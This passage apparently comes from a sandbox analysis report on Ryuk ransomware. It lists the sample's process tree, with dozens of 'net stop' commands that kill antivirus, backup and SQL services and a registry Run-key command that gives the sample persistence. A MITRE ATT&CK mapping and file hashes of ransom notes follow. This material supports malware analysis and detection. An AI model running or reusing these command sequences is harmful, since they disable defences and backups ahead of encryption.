"C:\Windows\System32\net.exe" stop ReportServer$TPS /y
2⤵
PID:4564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
3⤵
PID:4292

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y
2⤵
PID:4588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
3⤵
PID:3436

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop RESvc /y
2⤵
PID:4612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESvc /y
3⤵
PID:4620

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop sacsvr /y
2⤵
PID:4648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
3⤵
PID:3884

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SamSs /y
2⤵
PID:4688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
3⤵
PID:3744

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SAVAdminService /y
2⤵
PID:4716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
3⤵
PID:4432

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SAVService /y
2⤵
PID:4732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVService /y
3⤵
PID:3644

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SDRSVC /y
2⤵
PID:4752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
3⤵
PID:4952

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SepMasterService /y
2⤵
PID:4768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
3⤵
PID:4624

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ShMonitor /y
2⤵
PID:4808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
3⤵
PID:3836

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop Smcinst /y
2⤵
PID:4832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
3⤵
PID:4264

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SmcService /y
2⤵
PID:4876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SmcService /y
3⤵
PID:4704

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SMTPSvc /y
2⤵
PID:4916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
3⤵
PID:4844

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SNAC /y
2⤵
PID:4944

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SNAC /y
3⤵
PID:5080

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SntpService /y
2⤵
PID:4960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
3⤵
PID:5012

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop sophossps /y
2⤵
PID:5000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophossps /y
3⤵
PID:4392

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y
2⤵
PID:5024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
3⤵
PID:3088

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y
2⤵
PID:5068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
3⤵
PID:5044

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y
2⤵
PID:5100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
3⤵
PID:4364

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y
2⤵
PID:5112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
3⤵
PID:5048

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y
2⤵
PID:3164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
3⤵
PID:5032

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y
2⤵
PID:4008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
3⤵
PID:4448

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y
2⤵
PID:3912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
3⤵
PID:4016

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y
2⤵
PID:3924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
3⤵
PID:3316

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y
2⤵
PID:4028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
3⤵
PID:4496

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$TPS /y
2⤵
PID:3964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
3⤵
PID:3732

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y
2⤵
PID:3300

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
3⤵
PID:4508

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:4072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:4292

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y
2⤵
PID:4104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
3⤵
PID:4652

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLBrowser /y
2⤵
PID:4428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
3⤵
PID:4612

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLSafeOLRService /y
2⤵
PID:4176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
3⤵
PID:4152

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y
2⤵
PID:4548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
3⤵
PID:3248

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLTELEMETRY /y
2⤵
PID:4240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
3⤵
PID:4196

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y
2⤵
PID:4676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
3⤵
PID:4684

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLWriter /y
2⤵
PID:4724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
3⤵
PID:4732

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SstpSvc /y
2⤵
PID:4336

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
3⤵
PID:3848

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_filter /y
2⤵
PID:3980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
3⤵
PID:4772

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop svcGenericHost /y
2⤵
PID:4468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
3⤵
PID:3780

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_service /y
2⤵
PID:4396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_service /y
3⤵
PID:4880

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_update_64 /y
2⤵
PID:4924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
3⤵
PID:4868

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TmCCSF /y
2⤵
PID:4636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
3⤵
PID:3864

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop tmlisten /y
2⤵
PID:4528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
3⤵
PID:2268

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TrueKey /y
2⤵
PID:5108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
3⤵
PID:2468

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TrueKeyScheduler /y
2⤵
PID:3424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
3⤵
PID:3788

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y
2⤵
PID:3696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
3⤵
PID:2252

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop UI0Detect /y
2⤵
PID:4164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
3⤵
PID:3540

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamBackupSvc /y
2⤵
PID:4080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
3⤵
PID:3088

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y
2⤵
PID:4780

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
3⤵
PID:3624

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y
2⤵
PID:4796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
3⤵
PID:5024

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamCloudSvc /y
2⤵
PID:4856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
3⤵
PID:4912

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamDeploymentService /y
2⤵
PID:4872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
3⤵
PID:5104

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamDeploySvc /y
2⤵
PID:4340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
3⤵
PID:4988

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y
2⤵
PID:3900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
3⤵
PID:3972

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamNFSSvc /y
2⤵
PID:4168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
3⤵
PID:3912

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamMountSvc /y
2⤵
PID:4632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
3⤵
PID:3996

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamRESTSvc /y
2⤵
PID:4660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
3⤵
PID:4748

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamTransportSvc /y
2⤵
PID:4532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
3⤵
PID:4124

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop W3Svc /y
2⤵
PID:3888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
3⤵
PID:4488

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop wbengine /y
2⤵
PID:4656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
3⤵
PID:3824

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop WRSVC /y
2⤵
PID:4004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
3⤵
PID:3208

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:4372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:4072

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:4420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:3884

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y
2⤵
PID:4472

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
3⤵
PID:3736

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_update /y
2⤵
PID:4148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update /y
3⤵
PID:4192

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y
2⤵
PID:4020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
3⤵
PID:4972

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y
2⤵
PID:4384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
3⤵
PID:5000

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "SQL Backups" /y
2⤵
PID:3936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQL Backups" /y
3⤵
PID:4388

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PROD /y
2⤵
PID:3436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
3⤵
PID:4548

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y
2⤵
PID:4840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
3⤵
PID:3644

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y
2⤵
PID:4516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
3⤵
PID:3676

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$PROD /y
2⤵
PID:5076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
3⤵
PID:4364

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop msftesql$PROD /y
2⤵
PID:4692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
3⤵
PID:4724

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop NetMsmqActivator /y
2⤵
PID:4564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
3⤵
PID:3780

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EhttpSrv /y
2⤵
PID:3952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
3⤵
PID:4264

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ekrn /y
2⤵
PID:4416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
3⤵
PID:4572

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ESHASRV /y
2⤵
PID:4680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
3⤵
PID:5008

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y
2⤵
PID:4624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
3⤵
PID:2360

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y
2⤵
PID:4896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
3⤵
PID:4132

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop AVP /y
2⤵
PID:4808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AVP /y
3⤵
PID:4492

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop klnagent /y
2⤵
PID:4836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop klnagent /y
3⤵
PID:4584

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y
2⤵
PID:3960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
3⤵
PID:3968

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y
2⤵
PID:4512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
3⤵
PID:3708

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop wbengine /y
2⤵
PID:4100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
3⤵
PID:3516

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop kavfsslp /y
2⤵
PID:4600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
3⤵
PID:3904

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop KAVFSGT /y
2⤵
PID:4312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
3⤵
PID:3788

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop KAVFS /y
2⤵
PID:4272

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
3⤵
PID:3620

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mfefire /y
2⤵
PID:4552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfefire /y
3⤵
PID:3892

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\red-necessary.exe" /f
2⤵
PID:2484

C:\Windows\system32\reg.exe
REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\red-necessary.exe" /f
3⤵
- Adds Run key to start application
PID:4368

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1227852746-1658983926-9156743031118326058727268906-79734982715869913111799168902"
1⤵
PID:864

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1848033333-1326045791-4558604161963353075-1018997922-1071350513-617710760358278528"
1⤵
PID:1640

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1579524364593223197-557034040-106759277-944638441-1017053288-2101743406724534680"
1⤵
PID:624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-177507956469221774519799787591003803703650581575-1716676910-1485779785-2144292147"
1⤵
PID:1768

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-634481375-2047937955-1590574640692976662-500320189-271092605414765986-1989747509"
1⤵
PID:3880

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "702247019-36669825517170159481324756916449969723-10918121441839954580-176018788"
1⤵
PID:3868

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-22624526019255754062133045491-2065614870-13131449121783375876-2146257484686862615"
1⤵
PID:3928

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-703906815-1085790868-1622782680-47939910318668244221994107497197913607-821046344"
1⤵
PID:3636

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "650747295-241702391-604156676-25875609419896330871485467731580395381-1509290427"
1⤵
PID:4088

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1720685362320165315343274862-1756326864-62665055612485478151999496465994016561"
1⤵
PID:3832

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3429510201179630999-13648110801898041830105301230512699765855306685752138121897"
1⤵
PID:3872

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "200446699596455682414644784028126461831047471015-950454032770568371219723112"
1⤵
PID:3556

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1637228022339034167-2034883419-1255320865-1546196803498037557-1634975606-721165725"
1⤵
PID:3808

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-47976638235878064311494280051993847235205128046611664486232065057008-1373918662"
1⤵
PID:4356

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1602137124139680170118303449620224167181749269503486279277-910863845-799966974"
1⤵
PID:4744

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "957117577-12176023452068754663-1425310712-1441802491696250787-2880991941978691791"
1⤵
PID:3616

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "244132673-15047050-16840959631779355019-1610392110-9953504707606413261463357507"
1⤵
PID:4120

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2750125031707594262786088647-917731884936499882142638976810301462931374165447"
1⤵
PID:4324

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "93487641821557628994202310474896428861435503-789007148-1277491572390086606"
1⤵
PID:3992

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1575561090-374214714-773978058-95060451018595924611185255184-268882686-47922130"
1⤵
PID:4376

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9602554641788087458375442129608398471-163140709449046948-10974387242045482265"
1⤵
PID:4412

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-479131281-19545864071550872105-647949749273520694-1358257402-6203460961967219610"
1⤵
PID:3932

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "299791501-10443924401431168027-205758985-1591129663-8644891914371393341422047281"
1⤵
PID:4844

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1341701821-487370291-1509256327245856443-94209576716327204831983952491-649099522"
1⤵
PID:4068

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1047828031778214643-145676736215274324181815547984515637644599088281-2016361582"
1⤵
PID:5044

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "107639739-982198706-760582677-12394340369555339951316541243-1732043736-596776964"
1⤵
PID:3748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1149868702459714679-545100732-2430042771962071057447275261170591991220530071"
1⤵
PID:4448

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "8425274231837531723787701463-546174521-1377664733-893691761313258297237812307"
1⤵
PID:4916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1782696451-112048089410479121761728184667806237816573087127-1453263573-1826397249"
1⤵
PID:4012

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "697575129-201214070611176363521218245352-152178444-19966602311218606004-970923461"
1⤵
PID:4292

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1995846076157829080755716893617321087491043386110-3535663406588586551680517770"
1⤵
PID:3300

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "38904696087029410555086235-1334221151960554792256555994308227473518223509"
1⤵
PID:4612

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-960237983-1525087893181466246316134639562025184910-15256643171067538488-1469548154"
1⤵
PID:4716

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4204

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:4588

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Documents and Settings\RyukReadMe.txt

MD5
7c4d1e546a3fd0a42a6f84fb3d9fb4aa

SHA1
a379fc90f6aa6f45ec5fa42c1b3818104e2a62b7

SHA256
1ae6232ac9edc96d184aa261d11536f0edc1f85d0cc7a455b80375014b0dfe10

SHA512
cfc0d3494b3a3bc92a8de2841691dbbcbe16e08f2ee5bc59be3059ce3544b8a237a9d39f8ac8a8b445ad7cf3a0fda149f09a18f151abb4bd301ec2b161b26ad3

Download Submit
C:\MSOCache\All Users\RyukReadMe.txt

MD5
7c4d1e546a3fd0a42a6f84fb3d9fb4aa

SHA1
a379fc90f6aa6f45ec5fa42c1b3818104e2a62b7

SHA256
1ae6232ac9edc96d184aa261d11536f0edc1f85d0cc7a455b80375014b0dfe10

SHA512
cfc0d3494b3a3bc92a8de2841691dbbcbe16e08f2ee5bc59be3059ce3544b8a237a9d39f8ac8a8b445ad7cf3a0fda149f09a18f151abb4bd301ec2b161b26ad3

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab

MD5
ce66310ff0245dafea6f75a49f2ec2b3

SHA1
81d96c4531b8438873b211bffbb6935ec5fa43d1

SHA256
a7aa9b359fe4c074ffc9d6ae007a397d6cf395bf4e34e697f027e53bd5e9bbdc

SHA512
73945a1ccd8de48a5535762a7dd93c8928785599911e669239c10da3673e91a68e003b8a8ecfb6ac61303ccf7b98e17ea604e1f28e773e5c3f8c79fbaf8615be

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.msi

MD5
bde53763adec96ca862c8495478471b5

SHA1
447e0c0da5fbbcde3b662bbd8cdeacd7bc91d15b

SHA256
049f8a3fb9d5ec7b6dafca789ac68c5c66effecad763acd61cc47ca97b5002dc

SHA512
726f44faeb32a39fff77e84e7ce1a6d8b4e446ba3eaf94e8b7fb64f3a5bcf5cd50c43f41d6dede6ae3c2f4c783952042dc61998949df4459a22f453462c05293

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml

MD5
553298ab9126bb127ac00ed56b26d174

SHA1
0842c0ea254150279c98c5747965a9e9dc148018

SHA256
7791190413c8d3ddfe388dba139063ef457bda35036e69506eb4fba13184ec55

SHA512
d95b9ed74c83709444f680a09a5c377ece6cccb905ce07c14d4eb52c0b2ff513cdacb8d74401904268a5ce649c03d4d8c741a9507404ba4a1b0ff7a641a01ef8

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi

MD5
89652afd864c5147a317f7420442a6e2

SHA1
4297dd18838cbbbdbe5d7fccefbccd09ee7b7f1f

SHA256
f8e8aedbcbb42e1ea682ac6bd592dc00c61e31deadabbd2d98235ecc41f316b0

SHA512
49bc7692579351c493a5e35946bf63b434c0312bf8b8847e56eb90cec446a6c1912b20c212556aa1d8591f50f7f887917dc2c83fff14f4252de062a5297f5966

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml

MD5
af79a40c4178ca40b99d8a2c45f742e7

SHA1
d32e62611880f0813668a7d6d135859ba0acf93d

SHA256
d15582738e1f11643335949e6614d9eeee3f396465e7e2b881a91ebee2ce507a

SHA512
b0c58801a4a3aebe3f5c3e6e173fcd5477d2bd33d6a6ddf147dbec26b3625f112ddda2037d8a6efdd4a5e4ef66b52fe375630f57c143f1dca9b697d2645edb6b

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPsWW.cab

MD5
71fd905ebb980476b20be63403f7d570

SHA1
a0c2510c3807e4c8e603be175483b270b870f5b2

SHA256
6275afd81909877b4ea4169fa8b45bff7de57a21b860531dc6f8a393c73f0458

SHA512
c90e1ca7797c62bdcf64544898a51be7718dad54a05781761046672d22867bda8607537ee0e021c996e56bf585c81301f6c0528b56bb10d2e87b21ccdfe80013

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPsWW2.cab

MD5
7e74aa84493d15a79339fd8ac3ab1b2a

